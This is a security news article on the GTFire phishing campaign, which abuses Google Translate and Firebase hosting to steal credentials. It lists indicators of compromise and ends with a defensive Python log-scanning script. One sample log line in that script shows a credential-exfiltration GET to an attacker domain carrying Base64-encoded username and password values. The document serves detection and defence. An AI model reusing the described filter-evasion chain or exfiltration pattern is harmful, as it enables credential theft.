A sophisticated phishing campaign known as GTFire is exploiting two of Google’s most trusted services, Firebase and Google Translate, to pilfer login credentials from unsuspecting victims globally. This alarming trend highlights how cybercriminals are increasingly leveraging legitimate infrastructure to bypass traditional security measures, making it significantly harder to detect and block malicious activities. The GTFire scheme enables phishing links to slip past email filters and web gateways by masquerading as legitimate Google-owned domains, leading victims to convincing fake login pages that ultimately steal their sensitive information.
The sheer scale of the GTFire operation is considerable. Intelligence gathered from exposed attacker-controlled command-and-control (C2) servers has revealed thousands of stolen credentials associated with over 1,000 organizations across more than 100 countries and over 200 industries. Mexico stands out with the highest number of confirmed victims, totaling 385, primarily within the manufacturing, education, and government sectors. The United States follows with 101 victims, then Spain with 67, India with 54, and Argentina with 50, indicating a widespread and diverse targeting strategy.
How GTFire Uses Google Services for Credential Theft
Analyst reports from Group-IB have identified GTFire as a meticulously organized and large-scale operation focused on credential harvesting. The attackers demonstrate a strategic approach by reusing phishing templates across various targeted brands with only minor modifications. This allows for rapid deployment and efficient management of a multi-step credential collection process across centralized servers. Stolen data is systematically organized by date, language, and the targeted service, suggesting a high degree of operational efficiency.
Investigators have identified over 120 unique phishing domains associated with this campaign, all employing naming conventions designed for swift infrastructure rotation. This tactic makes it challenging for security systems to keep up with and block the evolving network of malicious sites. The reach of GTFire is clearly global, with threat actors carefully customizing each phishing page to precisely mimic the visual identity of targeted brands. This meticulous attention to detail renders the fake login portals virtually indistinguishable from legitimate ones.
Once a victim submits a username and password on a phishing page, the GTFire kit displays a seemingly innocuous “incorrect password” error and prompts the user to try again; both submissions are captured in the background without the victim’s knowledge. After credential submission the victim is seamlessly redirected to the legitimate brand’s website, which deliberately delays any immediate awareness of an attack and grants the attackers valuable time to exfiltrate the stolen data before the compromise is detected.
The GTFire campaign underscores a significant concern for cybersecurity professionals: the ease with which trusted infrastructure can be weaponized. Traditional methods of URL reputation checks and static blocklists prove insufficient when phishing links are hosted on established, reputable domains like those owned by Google. Brand impersonation remains one of the most potent social engineering tactics, and GTFire exemplifies its efficient global deployment.
The Technical Chain of Exploitation
The attack vector typically begins with a victim receiving a phishing email containing a malicious link that incorporates Google Translate’s domain (translate.goog). This URL serves as an invisible relay, channeling the user’s request through Google’s translation proxy infrastructure. This sophisticated redirection ultimately leads the victim to a phishing page hosted on Firebase’s platform.
Because the initial link points to a legitimate, Google-owned domain, email security gateways and web filters often fail to flag it as suspicious, allowing it to bypass standard security protocols. Firebase then hosts the final phishing pages, where attackers frequently register large numbers of randomly named *.web.app subdomains. These are rotated rapidly to hinder efforts to block them effectively.
Each phishing page is dynamically generated to display brand-specific logos and input fields. This is achieved through a reusable phishing framework that requires only minor cosmetic alterations for each new target. This efficiency in adaptation allows GTFire to scale its operations quickly and target a wide array of organizations.
Following the submission of credentials, the captured data is transmitted to attacker-controlled C2 servers via HTTP GET requests. Passwords are sent in a Base64-encoded format, accompanied by metadata such as the victim’s country of origin and browser language. The backend infrastructure for these C2 servers often leverages LiteSpeed Web Server instances, utilizing PHP-based collection scripts, which are commercially available tools that reduce operational overhead and accelerate deployment.
Organizations are strongly advised to implement phishing-resistant multi-factor authentication (MFA) solutions and conduct regular employee training focused on recognizing sophisticated phishing techniques, particularly those leveraging trusted services. Security teams should develop detection rules specifically to flag URL patterns that combine translate.goog with *.web.app domains. Additionally, continuous monitoring of trusted cloud platforms for instances of brand impersonation is crucial.
Sharing indicators of compromise (IOCs), including network IOCs such as jnhwzs.fyi and gnpnia.lat, along with file-based IOCs related to the All-in-1.php collection scripts, with relevant CERT communities is vital for containing the spread of this evolving campaign. Proactive information sharing and updating security protocols are essential in the ongoing battle against such advanced cyber threats.
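As an added example (not code from the article or from Group-IB), the following Python script applies the detection rule recommended above to a handful of constructed web-proxy log lines. It decodes the origin hostname hidden inside a translate.goog proxy URL and flags the combination of translate.goog with a *.web.app origin, and it separately flags GET requests to the network IoCs quoted above whose query values look Base64-encoded, matching the C2 exfiltration step described earlier. The translate.goog hostname encoding (dots written as single hyphens, literal hyphens doubled), the log-line format, the query parameter names and every IP address and credential in the sample are assumptions or constructed values.

```python
"""Added example: detection pass for the GTFire link and exfiltration patterns.

Not code from the article or from Group-IB. The proxy log format, the query
parameter names and all sample values below are constructed; the translate.goog
hostname encoding is an assumption (see decode_translate_goog_host).
"""
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Network IoCs quoted in the article (not constructed).
IOC_DOMAINS = {"jnhwzs.fyi", "gnpnia.lat"}

TRANSLATE_SUFFIX = ".translate.goog"


def decode_translate_goog_host(host: str) -> Optional[str]:
    """Recover the origin hostname from a translate.goog proxy hostname.

    Assumption: the proxy writes the origin host as one label in which "."
    becomes "-" and a literal "-" becomes "--", so
    acme--login-web-app.translate.goog stands for acme-login.web.app.
    Returns None when the host is not a translate.goog proxy host.
    """
    host = host.lower()
    if not host.endswith(TRANSLATE_SUFFIX):
        return None
    label = host[: -len(TRANSLATE_SUFFIX)]
    # Split only on hyphens that are not part of a "--" pair.
    parts = re.split(r"(?<!-)-(?!-)", label)
    return ".".join(p.replace("--", "-") for p in parts)


def is_web_app_host(host: str) -> bool:
    """True for Firebase Hosting's *.web.app namespace."""
    return host == "web.app" or host.endswith(".web.app")


def looks_base64(value: str, min_len: int = 8) -> bool:
    """Weak heuristic: the value is syntactically valid Base64 and not tiny.

    Short plain words can also pass, so this is only a supporting signal;
    the alert decision below rests on the host, not on this check.
    """
    if len(value) < min_len or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def classify_url(url: str) -> Dict:
    """Compute the detection signals for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    origin = decode_translate_goog_host(host)
    query = parse_qsl(parts.query, keep_blank_values=True)
    signals = {
        "host": host,
        "translate_proxy": origin is not None,
        "proxied_origin": origin,
        # The rule the article recommends: translate.goog wrapping *.web.app.
        "translate_to_web_app": origin is not None and is_web_app_host(origin),
        "ioc_domain": any(host == d or host.endswith("." + d) for d in IOC_DOMAINS),
        "base64_params": [k for k, v in query if looks_base64(v)],
    }
    signals["alert"] = signals["translate_to_web_app"] or signals["ioc_domain"]
    return signals


# Constructed proxy log lines: timestamp, client IP, method, URL, status.
# Line 1 is a translate.goog link to a *.web.app page; line 3 is a GET to one
# of the article's IoC domains with Base64-encoded "u" and "p" values
# (here alice@example.com / hunter2). Lines 2, 4 and 5 match neither rule
# (a direct *.web.app request on its own is far too common to alert on).
SAMPLE_LOG = """\
2024-05-02T09:14:03Z 10.1.4.21 GET https://acme--login-web-app.translate.goog/index.html?_x_tr_sl=auto&_x_tr_tl=en 200
2024-05-02T09:14:09Z 10.1.4.21 GET https://acme-login.web.app/app.js 200
2024-05-02T09:14:31Z 10.1.4.21 GET https://jnhwzs.fyi/All-in-1.php?u=YWxpY2VAZXhhbXBsZS5jb20=&p=aHVudGVyMg==&c=MX&l=es-MX 200
2024-05-02T09:15:00Z 10.1.4.22 GET https://en-m-wikipedia-org.translate.goog/wiki/Phishing?_x_tr_sl=auto&_x_tr_tl=es 200
2024-05-02T09:15:12Z 10.1.4.23 GET https://www.example.com/search?q=firebase+hosting 200
"""

LOG_LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def scan_log(text: str) -> List[Dict]:
    """Return one record per log line whose URL raises an alert."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # ignore lines that do not match the assumed format
        ts, client, _method, url, _status = m.groups()
        sig = classify_url(url)
        if sig["alert"]:
            hits.append({"time": ts, "client": client, **sig})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["host"], hit["proxied_origin"], hit["base64_params"])
```

Run against the sample it reports two lines: the translate.goog link whose decoded origin is acme-login.web.app, and the request to jnhwzs.fyi carrying two Base64-looking parameters. Decoding the proxied hostname is the part worth keeping in a production rule: matching the literal string "web-app.translate.goog" would miss origins whose Firebase subdomain itself contains hyphens, and the plain *.web.app request that follows the proxied one is what to pivot on when reconstructing the full chain.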